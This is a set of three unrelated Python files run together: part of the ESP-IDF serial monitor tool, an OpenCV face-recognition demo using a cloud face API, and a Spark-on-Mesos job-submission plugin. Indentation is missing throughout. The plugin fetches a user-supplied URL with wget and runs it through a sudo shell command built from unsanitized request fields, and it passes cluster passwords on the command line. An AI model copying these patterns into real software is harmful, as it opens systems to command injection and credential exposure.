sys.stderr.write(ANSI_NORMAL + '\n')
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b'':
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b''
if sp[-1] != b'':
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b'':
if self._serial_check_exit and line == self.console_parser.exit_key.encode('latin-1'):
raise SerialStopException()
self.check_panic_decode_trigger(line)
self.check_coredump_trigger_before_print(line)
if self._force_line_print or self._line_matcher.match(line.decode(errors='ignore')):
self._print(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_coredump_trigger_after_print(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
        # of the line. But if we haven't received it after some time, we need
# to make a decision.
if self._last_line_part != b'':
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors='ignore'))):
self._force_line_print = True
self._print(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b''
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b''
if self.enable_address_decoding:
for m in re.finditer(MATCH_PCADDR, line.decode(errors='ignore')):
self.lookup_pc_address(m.group())
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print('--- {}'.format(reason))
red_print(self.console_parser.get_next_action_text())
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
ret = self.console_parser.parse_next_action_key(k)
if ret is not None:
cmd = ret[1]
if cmd == CMD_STOP:
# the stop command should be handled last
self.event_queue.put(ret)
else:
self.cmd_queue.put(ret)
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [target]
else:
popen_args = [self.make, target]
yellow_print('Running %s...' % ' '.join(popen_args))
p = subprocess.Popen(popen_args, env=os.environ)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action('Build failed')
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ['%saddr2line' % self.toolchain_prefix,
'-pfiaC', '-e', self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd='.')
if b'?? ??:0' not in translation:
self._print(translation.decode(), console_printer=yellow_print)
except OSError as e:
red_print('%s: %s' % (' '.join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b''
m = re.search(b'\\$(T..)#(..)', line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(bytes([p])) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
if self.websocket_client:
yellow_print('Communicating through WebSocket')
self.websocket_client.send({'event': 'gdb_stub',
'port': self.serial.port,
'prog': self.elf_file})
yellow_print('Waiting for debug finished event')
self.websocket_client.wait([('event', 'debug_finished')])
                    yellow_print('Communication through WebSocket is finished')
else:
self.run_gdb()
else:
red_print('Malformed gdb message... calculated checksum %02x received %02x' % (chsum, calc_chsum))
def check_coredump_trigger_before_print(self, line):
if self._decode_coredumps == COREDUMP_DECODE_DISABLE:
return
if COREDUMP_UART_PROMPT in line:
yellow_print('Initiating core dump!')
self.event_queue.put((TAG_KEY, '\n'))
return
if COREDUMP_UART_START in line:
yellow_print('Core dump started (further output muted)')
self._reading_coredump = COREDUMP_READING
self._coredump_buffer = b''
self._output_enabled = False
return
if COREDUMP_UART_END in line:
self._reading_coredump = COREDUMP_DONE
yellow_print('\nCore dump finished!')
self.process_coredump()
return
if self._reading_coredump == COREDUMP_READING:
kb = 1024
buffer_len_kb = len(self._coredump_buffer) // kb
self._coredump_buffer += line.replace(b'\r', b'') + b'\n'
new_buffer_len_kb = len(self._coredump_buffer) // kb
if new_buffer_len_kb > buffer_len_kb:
yellow_print('Received %3d kB...' % (new_buffer_len_kb), newline='\r')
def check_coredump_trigger_after_print(self, line):
if self._decode_coredumps == COREDUMP_DECODE_DISABLE:
return
# Re-enable output after the last line of core dump has been consumed
if not self._output_enabled and self._reading_coredump == COREDUMP_DONE:
self._reading_coredump = COREDUMP_IDLE
self._output_enabled = True
self._coredump_buffer = b''
def process_coredump(self):
if self._decode_coredumps != COREDUMP_DECODE_INFO:
raise NotImplementedError('process_coredump: %s not implemented' % self._decode_coredumps)
coredump_script = os.path.join(os.path.dirname(__file__), '..', 'components', 'espcoredump', 'espcoredump.py')
coredump_file = None
try:
# On Windows, the temporary file can't be read unless it is closed.
# Set delete=False and delete the file manually later.
with tempfile.NamedTemporaryFile(mode='wb', delete=False) as coredump_file:
coredump_file.write(self._coredump_buffer)
coredump_file.flush()
if self.websocket_client:
self._output_enabled = True
yellow_print('Communicating through WebSocket')
self.websocket_client.send({'event': 'coredump',
'file': coredump_file.name,
'prog': self.elf_file})
yellow_print('Waiting for debug finished event')
self.websocket_client.wait([('event', 'debug_finished')])
                    yellow_print('Communication through WebSocket is finished')
else:
cmd = [sys.executable,
coredump_script,
'info_corefile',
'--core', coredump_file.name,
'--core-format', 'b64',
self.elf_file
]
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
self._output_enabled = True
self._print(output)
self._output_enabled = False # Will be reenabled in check_coredump_trigger_after_print
except subprocess.CalledProcessError as e:
yellow_print('Failed to run espcoredump script: {}\n{}\n\n'.format(e, e.output))
self._output_enabled = True
self._print(COREDUMP_UART_START + b'\n')
self._print(self._coredump_buffer)
# end line will be printed in handle_serial_input
finally:
if coredump_file is not None:
try:
os.unlink(coredump_file.name)
except OSError as e:
yellow_print("Couldn't remote temporary core dump file ({})".format(e))
def check_panic_decode_trigger(self, line):
if self._decode_panic == PANIC_DECODE_DISABLE:
return
if self._reading_panic == PANIC_IDLE and re.search(PANIC_START, line.decode('ascii', errors='ignore')):
self._reading_panic = PANIC_READING
yellow_print('Stack dump detected')
if self._reading_panic == PANIC_READING and PANIC_STACK_DUMP in line:
self._output_enabled = False
if self._reading_panic == PANIC_READING:
self._panic_buffer += line.replace(b'\r', b'') + b'\n'
if self._reading_panic == PANIC_READING and PANIC_END in line:
self._reading_panic = PANIC_IDLE
self._output_enabled = True
self.process_panic_output(self._panic_buffer)
self._panic_buffer = b''
def process_panic_output(self, panic_output):
panic_output_decode_script = os.path.join(os.path.dirname(__file__), '..', 'tools', 'gdb_panic_server.py')
panic_output_file = None
try:
# On Windows, the temporary file can't be read unless it is closed.
# Set delete=False and delete the file manually later.
with tempfile.NamedTemporaryFile(mode='wb', delete=False) as panic_output_file:
panic_output_file.write(panic_output)
panic_output_file.flush()
cmd = [self.toolchain_prefix + 'gdb',
'--batch', '-n',
self.elf_file,
'-ex', "target remote | \"{python}\" \"{script}\" --target {target} \"{output_file}\""
.format(python=sys.executable,
script=panic_output_decode_script,
target=self.target,
output_file=panic_output_file.name),
'-ex', 'bt']
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
yellow_print('\nBacktrace:\n\n')
self._print(output)
except subprocess.CalledProcessError as e:
yellow_print('Failed to run gdb_panic_server.py script: {}\n{}\n\n'.format(e, e.output))
self._print(panic_output)
finally:
if panic_output_file is not None:
try:
os.unlink(panic_output_file.name)
except OSError as e:
yellow_print("Couldn't remove temporary panic output file ({})".format(e))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ['%sgdb' % self.toolchain_prefix,
'-ex', 'set serial baud %d' % self.serial.baudrate,
'-ex', 'target remote %s' % self.serial.port,
'-ex', 'interrupt', # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd='.')
process.wait()
except OSError as e:
red_print('%s: %s' % (' '.join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except Exception:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(['stty', 'sane'])
except Exception:
pass # don't care if there's no stty, we tried...
self.prompt_next_action('gdb exited')
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
        yellow_print('\nToggle output display: {}. Type Ctrl-T Ctrl-Y to show/hide the output again.'.format(self._output_enabled))
def toggle_logging(self):
if self._log_file:
self.stop_logging()
else:
self.start_logging()
def start_logging(self):
if not self._log_file:
try:
name = 'log.{}.{}.txt'.format(os.path.splitext(os.path.basename(self.elf_file))[0],
datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
self._log_file = open(name, 'wb+')
yellow_print('\nLogging is enabled into file {}'.format(name))
except Exception as e:
red_print('\nLog file {} cannot be created: {}'.format(name, e))
def stop_logging(self):
if self._log_file:
try:
name = self._log_file.name
self._log_file.close()
yellow_print('\nLogging is disabled and file {} has been closed'.format(name))
except Exception as e:
red_print('\nLog file cannot be closed: {}'.format(e))
finally:
self._log_file = None
def _print(self, string, console_printer=None):
if console_printer is None:
console_printer = self.console.write_bytes
if self._output_enabled:
console_printer(string)
if self._log_file:
try:
if isinstance(string, type(u'')):
string = string.encode()
self._log_file.write(string)
except Exception as e:
red_print('\nCannot write to file: {}'.format(e))
# don't fill-up the screen with the previous errors (probably consequent prints would fail also)
self.stop_logging()
def handle_commands(self, cmd):
if cmd == CMD_STOP:
self.console_reader.stop()
self.serial_reader.stop()
elif cmd == CMD_RESET:
self.serial.setRTS(True)
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(0.2)
self.serial.setRTS(False)
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
self.output_enable(True)
elif cmd == CMD_MAKE:
self.run_make('encrypted-flash' if self.encrypted else 'flash')
elif cmd == CMD_APP_FLASH:
self.run_make('encrypted-app-flash' if self.encrypted else 'app-flash')
elif cmd == CMD_OUTPUT_TOGGLE:
self.output_toggle()
elif cmd == CMD_TOGGLE_LOGGING:
self.toggle_logging()
elif cmd == CMD_ENTER_BOOT:
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
raise RuntimeError('Bad command data %d' % (cmd))
def main():
parser = argparse.ArgumentParser('idf_monitor - a serial output monitor for esp-idf')
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--disable-address-decoding', '-d',
help="Don't print lines about decoded addresses from the application ELF file.",
action='store_true',
        default=True if os.environ.get('ESP_MONITOR_DECODE') == '0' else False  # environment values are strings
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.getenv('IDF_MONITOR_BAUD', os.getenv('MONITORBAUD', 115200)))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--encrypted',
help='Use encrypted targets while running make',
action='store_true')
parser.add_argument(
'--toolchain-prefix',
help='Triplet prefix to add before cross-toolchain names',
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
'--eol',
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help='End of line to use when sending to the serial port',
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help='Filtering string',
default=DEFAULT_PRINT_FILTER)
parser.add_argument(
'--decode-coredumps',
choices=[COREDUMP_DECODE_INFO, COREDUMP_DECODE_DISABLE],
default=COREDUMP_DECODE_INFO,
help='Handling of core dumps found in serial output'
)
parser.add_argument(
'--decode-panic',
choices=[PANIC_DECODE_BACKTRACE, PANIC_DECODE_DISABLE],
default=PANIC_DECODE_DISABLE,
help='Handling of panic handler info found in serial output'
)
parser.add_argument(
'--target',
required=False,
help='Target name (used when stack dump decoding is enabled)'
)
parser.add_argument(
'--ws',
default=os.environ.get('ESP_IDF_MONITOR_WS', None),
help='WebSocket URL for communicating with IDE tools for debugging purposes'
)
args = parser.parse_args()
# GDB uses CreateFile to open COM port, which requires the COM name to be r'\\.\COMx' if the COM
# number is larger than 10
if os.name == 'nt' and args.port.startswith('COM'):
args.port = args.port.replace('COM', r'\\.\COM')
yellow_print('--- WARNING: GDB cannot open serial ports accessed as COMx')
yellow_print('--- Using %s instead...' % args.port)
elif args.port.startswith('/dev/tty.') and sys.platform == 'darwin':
args.port = args.port.replace('/dev/tty.', '/dev/cu.')
yellow_print('--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.')
yellow_print('--- Using %s instead...' % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ['MAKEFLAGS']
makeflags = re.sub(r'--jobserver[^ =]*=[0-9,]+ ?', '', makeflags)
os.environ['MAKEFLAGS'] = makeflags
except KeyError:
pass # not running a make jobserver
# Pass the actual used port to callee of idf_monitor (e.g. make) through `ESPPORT` environment
# variable
# To make sure the key as well as the value are str type, by the requirements of subprocess
espport_key = str('ESPPORT')
espport_val = str(args.port)
os.environ.update({espport_key: espport_val})
ws = WebSocketClient(args.ws) if args.ws else None
try:
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.encrypted,
args.toolchain_prefix, args.eol,
args.decode_coredumps, args.decode_panic, args.target,
ws, enable_address_decoding=not args.disable_address_decoding)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.console_parser.exit_key),
key_description(monitor.console_parser.menu_key),
key_description(monitor.console_parser.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
finally:
if ws:
ws.close()
class WebSocketClient(object):
"""
WebSocket client used to advertise debug events to WebSocket server by sending and receiving JSON-serialized
dictionaries.
Advertisement of debug event:
{'event': 'gdb_stub', 'port': '/dev/ttyUSB1', 'prog': 'build/elf_file'} for GDB Stub, or
{'event': 'coredump', 'file': '/tmp/xy', 'prog': 'build/elf_file'} for coredump,
where 'port' is the port for the connected device, 'prog' is the full path to the ELF file and 'file' is the
generated coredump file.
Expected end of external debugging:
{'event': 'debug_finished'}
"""
RETRIES = 3
CONNECTION_RETRY_DELAY = 1
def __init__(self, url):
self.url = url
self._connect()
def _connect(self):
"""
Connect to WebSocket server at url
"""
self.close()
for _ in range(self.RETRIES):
try:
self.ws = websocket.create_connection(self.url)
break # success
except NameError:
raise RuntimeError('Please install the websocket_client package for IDE integration!')
except Exception as e:
red_print('WebSocket connection error: {}'.format(e))
time.sleep(self.CONNECTION_RETRY_DELAY)
else:
raise RuntimeError('Cannot connect to WebSocket server')
def close(self):
try:
self.ws.close()
except AttributeError:
# Not yet connected
pass
except Exception as e:
red_print('WebSocket close error: {}'.format(e))
def send(self, payload_dict):
"""
Serialize payload_dict in JSON format and send it to the server
"""
for _ in range(self.RETRIES):
try:
self.ws.send(json.dumps(payload_dict))
yellow_print('WebSocket sent: {}'.format(payload_dict))
break
except Exception as e:
red_print('WebSocket send error: {}'.format(e))
self._connect()
else:
raise RuntimeError('Cannot send to WebSocket server')
def wait(self, expect_iterable):
"""
Wait until a dictionary in JSON format is received from the server with all (key, value) tuples from
expect_iterable.
"""
for _ in range(self.RETRIES):
try:
r = self.ws.recv()
except Exception as e:
red_print('WebSocket receive error: {}'.format(e))
self._connect()
continue
obj = json.loads(r)
if all([k in obj and obj[k] == v for k, v in expect_iterable]):
yellow_print('WebSocket received: {}'.format(obj))
break
red_print('WebSocket expected: {}, received: {}'.format(dict(expect_iterable), obj))
else:
raise RuntimeError('Cannot receive from WebSocket server')
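# Hedged usage sketch (assumption, not part of idf_monitor itself): a debug-event
# round trip with WebSocketClient, following the protocol described in the class
# docstring. The URL, serial port and ELF path below are placeholders.
def _websocket_roundtrip_example():
    client = WebSocketClient('ws://localhost:1123')   # assumed IDE-side server URL
    client.send({'event': 'gdb_stub',
                 'port': '/dev/ttyUSB1',               # assumed serial port
                 'prog': 'build/elf_file'})            # assumed ELF path
    # block until the IDE reports that external debugging has finished
    client.wait([('event', 'debug_finished')])
    client.close()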
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [0, 4, 2, 6, 1, 5, 3, 7]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output=None, decode_output=False):
self.output = output
self.decode_output = decode_output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
if self.decode_output:
self.output.write(data.decode())
else:
self.output.write(data)
except (IOError, OSError):
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1163
#
# Also possible for Windows to throw an OSError error if the data is invalid for the console
# (garbage bytes, etc)
pass
def write(self, data):
if isinstance(data, bytes):
data = bytearray(data)
else:
data = bytearray(data, 'utf-8')
for b in data:
b = bytes([b])
length = len(self.matched)
if b == b'\033': # ESC
self.matched = b
elif (length == 1 and b == b'[') or (1 < length < 7):
self.matched += b
if self.matched == ANSI_NORMAL.encode('latin-1'): # reset console
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
try:
self.output.flush()
except OSError:
# Account for Windows Console refusing to accept garbage bytes (serial noise, etc)
pass
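# Hedged usage sketch (assumption, not part of the original file): on Windows the
# monitor can route its output through ANSIColorConverter so that the ANSI color
# escapes emitted by IDF become SetConsoleTextAttribute calls.
def _ansi_converter_example():
    if os.name != 'nt':
        return
    converted = ANSIColorConverter(sys.stdout, decode_output=True)
    converted.write(b'\033[1;31mred and bold\033[0m back to the default color\n')
    converted.flush()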
if __name__ == '__main__':
main()
|
demo.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import base64
import cv2
from multiprocessing import Process,Queue
from aip import AipFace
APP_ID = '******'
API_KEY = '******'
SECRET_KEY = '******'
groupIdList = '******'
imageType = "BASE64"
client = AipFace(APP_ID, API_KEY, SECRET_KEY)
video = cv2.VideoCapture(0)
video.set(cv2.CAP_PROP_FRAME_WIDTH,1920)
video.set(cv2.CAP_PROP_FRAME_HEIGHT,1080)
x_const = int(video.get(cv2.CAP_PROP_FRAME_WIDTH) / 2)
y_const = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT) / 2)
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
scalar = 5
def video_show(i = 1):
# cv2.namedWindow("face", cv2.WINDOW_NORMAL)
# cv2.setWindowProperty("face", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
while True:
time = cv2.getTickCount()
_,cap = video.read()
img = cv2.resize(cap,(int(x_const*2/scalar),int(y_const*2/scalar)))
img_gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(img_gray,scaleFactor=1.1,minNeighbors=5)
i = i + 1
if i == 20:
i = 0
if Tx.empty() and len(faces):
                Tx.put(cv2.imencode(".jpg", img)[1].tobytes())  # tostring() is deprecated; tobytes() is the modern equivalent
for (x,y,w,h) in faces:
x *= scalar
y *= scalar
w *= scalar
h *= scalar
cv2.rectangle(cap,(x,y),(x+w,y+h),(255,0,0),2)
try:
Rx.get_nowait()
cv2.putText(cap,"Access",(x_const-85,y_const-150),cv2.FONT_HERSHEY_SIMPLEX,1.6,(0,0,255),2)
'''put your main code here'''
except:
pass
cv2.line(cap,(x_const-100,y_const+100),(x_const-100,y_const+80),(0,255,0),2)
cv2.line(cap,(x_const-100,y_const+100),(x_const-80,y_const+100),(0,255,0),2)
cv2.line(cap,(x_const+100,y_const+100),(x_const+80,y_const+100),(0,255,0),2)
cv2.line(cap,(x_const+100,y_const+100),(x_const+100,y_const+80),(0,255,0),2)
cv2.line(cap,(x_const+100,y_const-100),(x_const+100,y_const-80),(0,255,0),2)
cv2.line(cap,(x_const+100,y_const-100),(x_const+80,y_const-100),(0,255,0),2)
cv2.line(cap,(x_const-100,y_const-100),(x_const-100,y_const-80),(0,255,0),2)
cv2.line(cap,(x_const-100,y_const-100),(x_const-80,y_const-100),(0,255,0),2)
cv2.line(cap,(x_const-100,y_const-100+i*10),(x_const+100,y_const-100+i*10),(0,255,0),2)
cv2.putText(cap, "FPS:%d"%int(cv2.getTickFrequency()/(cv2.getTickCount()-time)), (5,15), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 2)
cv2.imshow('face',cap)
a = cv2.waitKey(1)
if a == ord('c') or a == ord('C'):
break
video.release()
cv2.destroyAllWindows()
def face_compare(Tx,Rx):
while True:
options = {"liveness_control":"HIGH"}
try:
result = client.search(str(base64.b64encode(Tx.get()),'UTF-8'), imageType, groupIdList,options)
        except Exception:  # network or encoding errors from the face API; retry with the next frame
continue
if "SUCCESS" in result["error_msg"] and result["result"]["user_list"][0]["score"] >= 80:
Rx.put(True)
if __name__ == '__main__':
Tx = Queue()
Rx = Queue()
p = Process(target = face_compare,args = (Tx,Rx),daemon = True)
p.start()
video_show()
|
plugin.py
|
# Copyright (c) 2017 UFCG-LSD and UPV-GRyCAP.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from broker import exceptions as ex
from broker.plugins import base
from broker.service import api
from broker.utils.framework import optimizer
from broker.utils.framework import monitor
from broker.utils.framework import controller
from broker.utils.plugins import mesos
from broker.utils import ssh
from broker.utils.logger import Log, configure_logging
from broker.plugins.base import GenericApplicationExecutor
from uuid import uuid4
import time
import threading
plugin_log = Log("Spark-Mesos_Plugin", "logs/mesos_plugin.log")
configure_logging()
class SparkMesosApplicationExecutor(GenericApplicationExecutor):
def __init__(self, app_id, frameworks_url):
self.application_state = "None"
self.state_lock = threading.RLock()
self.application_time = -1
self.start_time = -1
self.app_id = app_id
self.frameworks_url = frameworks_url
def get_application_state(self):
with self.state_lock:
state = self.application_state
return state
def update_application_state(self, state):
with self.state_lock:
self.application_state = state
def get_application_execution_time(self):
return self.application_time
def get_application_start_time(self):
return self.start_time
def start_application(self, data):
try:
self.update_application_state("Running")
plugin_log.log("%s | Starting application execution" %
(time.strftime("%H:%M:%S")))
binary_url = str(data['binary_url'])
execution_class = str(data['execution_class'])
execution_parameters = str(data['execution_parameters'])
expected_time = int(data['expected_time'])
number_of_jobs = int(data['number_of_jobs'])
starting_cap = int(data['starting_cap'])
# Optimizer integration
app_name = data['app_name']
days = 0
if app_name.lower() == 'bulma':
if 'days' in data.keys():
days = data['days']
else:
                    plugin_log.log("%s | 'days' parameter missing"
                                   % (time.strftime("%H:%M:%S")))
raise ex.ConfigurationError()
cores, vms = optimizer.get_info(api.optimizer_url,
expected_time,
app_name,
days)
optimizer_command = ''
if cores >= 0:
optimizer_command = ' --total-executor-cores %d ' % cores
plugin_log.log("%s | Submission id: %s" %
(time.strftime("%H:%M:%S"), self.app_id))
plugin_log.log("%s | Connecting with Mesos cluster..." %
(time.strftime("%H:%M:%S")))
conn = ssh.get_connection(api.mesos_url, api.cluster_username,
api.cluster_password,
api.cluster_key_path)
plugin_log.log("%s | Connected with Mesos cluster" %
(time.strftime("%H:%M:%S")))
# Execute all the spark needed commands
# to run an spark job from command line
if execution_class != "" and execution_class is not None:
# If the class field is empty, it means that the
# job binary is python
binary_path = '~/exec_bin.jar'
spark_run = ('sudo %s --name %s '
+ '--master mesos://%s:%s '
+ optimizer_command
+ '--class %s %s %s')
else:
binary_path = '~/exec_bin.py'
spark_run = ('sudo %s --name %s '
+ '--master mesos://%s:%s '
+ optimizer_command
+ '%s %s %s')
plugin_log.log("%s | Download the binary to cluster" %
(time.strftime("%H:%M:%S")))
try:
stdin, stdout, stderr = conn.exec_command('wget %s -O %s' %
(binary_url,
binary_path))
plugin_log.log("%s | Waiting for download the binary..." %
(time.strftime("%H:%M:%S")))
# TODO: Fix possible wget error
stdout.read()
plugin_log.log("%s | Binary downloaded" %
(time.strftime("%H:%M:%S")))
except Exception as e:
plugin_log.log("%s | Error downloading binary" %
(time.strftime("%H:%M:%S")))
self.update_application_state("Error")
return "Error"
i, o, e = conn.exec_command(spark_run % (api.spark_path,
self.app_id,
api.mesos_url,
api.mesos_port,
execution_class,
binary_path,
execution_parameters))
# Discovery ips of the executors from Mesos
# and discovery the ids on KVM using the ips
list_vms_one = ('onevm list --user %s --password %s --endpoint %s'
% (api.one_username,
api.one_password,
api.one_url))
stdin, stdout, stderr = conn.exec_command(list_vms_one)
list_response = stdout.read()
vms_ips, master = mesos.get_executors_ip(
conn, self.frameworks_url, self.app_id
)
plugin_log.log("%s | Master: %s"
% (time.strftime("%H:%M:%S"), master))
plugin_log.log("%s | Executors: %s"
% (time.strftime("%H:%M:%S"), vms_ips))
vms_ids = mesos.extract_vms_ids(list_response)
plugin_log.log("%s | Executors IDs: %s"
% (time.strftime("%H:%M:%S"), vms_ids))
executors_vms_ids = []
for ip in vms_ips:
for id in vms_ids:
vm_info_one = ('onevm show %s '
'--user %s '
'--password %s '
'--endpoint %s' % (id, api.one_username,
api.one_password,
api.one_url))
stdin, stdout, stderr = conn.exec_command(vm_info_one)
if ip in stdout.read():
executors_vms_ids.append(id)
break
plugin_log.log("%s | Executors IDs: %s" %
(time.strftime("%H:%M:%S"), executors_vms_ids))
# Set up the initial configuration of cpu cap
controller.setup_environment(api.controller_url, executors_vms_ids,
starting_cap, data)
info_plugin = {"spark_submisson_url": master,
"expected_time": expected_time,
"number_of_jobs": number_of_jobs}
plugin_log.log("%s | Starting monitor" %
(time.strftime("%H:%M:%S")))
monitor.start_monitor(api.monitor_url, self.app_id,
'spark-mesos', info_plugin, 2)
plugin_log.log("%s | Starting controller" %
(time.strftime("%H:%M:%S")))
controller.start_controller(api.controller_url,
self.app_id,
executors_vms_ids,
data)
            # This call blocks the plugin execution
            # until the Spark job has finished
            print(o.read())
plugin_log.log("%s | Stopping monitor" %
(time.strftime("%H:%M:%S")))
monitor.stop_monitor(api.monitor_url, self.app_id)
plugin_log.log("%s | Stopping controller" %
(time.strftime("%H:%M:%S")))
controller.stop_controller(api.controller_url, self.app_id)
plugin_log.log("%s | Remove binaries" %
(time.strftime("%H:%M:%S")))
conn.exec_command('rm -rf ~/exec_bin.*')
plugin_log.log("%s | Finished application execution" %
(time.strftime("%H:%M:%S")))
self.update_application_state("OK")
return 'OK'
        except Exception as e:
            plugin_log.log(str(e))
            print(str(e))
            self.update_application_state("Error")
